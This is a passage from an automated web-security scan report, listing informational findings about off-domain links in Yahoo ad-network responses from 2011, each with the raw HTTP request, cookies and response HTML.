Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982309);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=http://ad.doubleclick.net/jump/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315313359?">
<IMG SRC="http://ad.doubleclick.net/ad/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315313359?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=77&campID=106300&crID=126547&auctionID=13153133591610994-126547&cost=2.7600&pubICode=2145139&pub=24272&url=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331355624%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=77" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.33. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgCC9HQfquCkAOlZMpL9Io9i3zLSbCa8ZfwmnlAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rca20kb%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3DzV2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D59509023%26cb%3D1315313081109312%26i%3D140509%26r%3D0,0254ac84-d886-11e0-b5f4-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rca20kb/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=zV2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0406.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8^!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8^~~"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: uid=uid=04358f32-d886-11e0-934b-87a5113d12ef&_hmacv=1&_salt=1445808906&_keyid=k1&_hmac=71f80210cf05029c6f70f1dbcbfe9d80aca9ddb3; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1432
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=615918&bli=1634623&exPub=24284&city=Dallas&acp=2.8980&rnd=1315313092&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNklmPokAUhf%2EMPE0aakWgTWVSiAu2iCKO4otha1DWZglt%2E%2Eomoz3peZv7UPdUbs53UyeFyDiSFRypkYLIK0ERUcaIYBIFElRR9ATH4zGGBGJKFSo9HV%2E2Ol93%2DznX3rdGw%2E%2DURr1pfJf303hcIOc91yfWdrp4zOV8v3wMRcX%2Dx%2EQd8B9aD5f8a8%2EQ%2D7tlERezzdXQ%2EgJ0fls7duJ%2DxHB12FJLd1vTmWXmBF3WBxeunICenDA1D6fE1PfEfXAGP3tK2rZ6BiDOSt%2ELRK8OxZuXlKUYlDnYGXOGpDrwMEx9YDJZkRVCREQplRCWBoFVpKhYRAocYYiAzpqqrNsG7BiGGEMVY4qfV%2EZ0As63rGW8Oxr5ddTfUttLO%2Emy4Ymnuc6udk8UuMzlC8sC0%2DOGIYIkMiAUBFZMzJeOBTd6pp0rbldXJxP765a%2EmUkoe6mUz%2EyY62%2EJDmjs4zd%2D37RXJcp6ASzvGESgghBUCcLghYWL7jiNndWWBnOr2CWxQdWmB5yN8AgNHwDYDIKfP75yub%2EnWybFawb8rIxBk3RtWPbFOSjrIqpBVTYtaC%2EpRfC92o9qoY5y71I0QldEeZWVtygUvCIUGi%2E81dUFG0BCX40oJZ%2D4rcd5%2C&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.34. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313124134052&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p48ptjt/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320324/L=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL/B=ihhvQUoGYno-/J=1315313124134052/K=MkO1E30KWMQ9OU8J05I8pg/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR-4M6Eq!79C851U_*; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; lifb=0EA2)A9.-BM7F2P; bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: ih="b!!!!#!4ZV4!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: bh="b!!!!#!$?1O!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: vuday1=@n$r!!79C8U9BKI; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9>=4'28!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: uid=uid=23edad00-d886-11e0-8f26-78e7d1f5d92a&_hmacv=1&_salt=3223395414&_keyid=k1&_hmac=46d1029a6a257f1cf41cff0543eaa45aa4369721; path=/; expires=Thu, 06-Oct-2011 12:45:46 GMT
Set-Cookie: lifb=M5Jkn5cn<bEff6B; path=/; expires=Tue, 06-Sep-2011 16:45:46 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:46 GMT
Pragma: no-cache
Content-Length: 1425
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834542);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126412&supply=99&random=1315313146&rfr=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331124066%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad&rfid=238934&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMty4jAQ%2EJmFwxZYL78IpdoSYAjY5mmHJRdKtgTEGNsxImT%2Efg3epLiuDjOtnurWtBDpxgJGkYhQx%2DYc7UyziwgmMjaEvZMt2O12kQEtQjpIh62X93DA5m44Yr1L%2DB6y%2D3HXwq0RY%2EsbGNe3uX3rg%2E4UOs93nrHLR7iqh302T%2E7pa%2DI%2Eax9Nvt659Wst11QynCfj3rfZwCE%2Dniavax9664U%2DG2yUHwxTv48O08SBXhDrr4E4%2DsHLaTqaHv1vIaOtg1LFEwD7NI94qvFSaH%2E4Ic%2D1OD%2DB1XhEkVHodqESBXxq2ZZNiIZ0XTcQvAHcQbbZ0ZBpdExCwICeeHEGK4ohxoRgHepP3tLpgw3dsOfZDDi%2E5xQRZBAMqynw6N6I0it2x24eFGxZJEGqXZPF1fMPwuJH4zSUC8bC0gM9%2DnY4fCzCfLTJ8jaY1DaVF9YR0aGBgUv94ww5BLprf9GZhfYEGmO72ANGTWwijC2wpBD8%2EPGV%2DbbrQ1rBy5Rvd%2EGvOKL1H3Bx1u6stk1zLqRoFveAzd1DwGZK01LGTZnRi9q17WaZ1bsRVO0GTbMpT7RhRQ2Mz29KtrlS5Vt0UbIiGoRXNc4zJTPVICLLt%2EKz4JngUSobJOIJ%2E9zGslSPdCXDcSXj4i%2EI9dQd%2C"></script>
...[SNIP]...

15.35. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?XKUDAKjdGABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkUwEvWfquCkNTvJHg9xPRNBp4BwKItE8yE2ryAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1ufq9q%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DXvrxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D3618678928%26cb%3D1315313105713897%26i%3D140509%26r%3D0,10a65710-d886-11e0-be99-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z&ad_type=iframe&ad_size=300x100&site=140509&section_code=14485997&cb=1315313105713897&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1ufq9q/M=787833.14485997.14323832.8514476/D=sports/S=25664825:MIP2/_ylt=Amg2OFI6cJlUlIgmD62T3F05nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=XvrxAdBDRyg-/J=1315313105713897/K=r8awXcUkJHjbbi3QZybcoQ/A=6284797/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
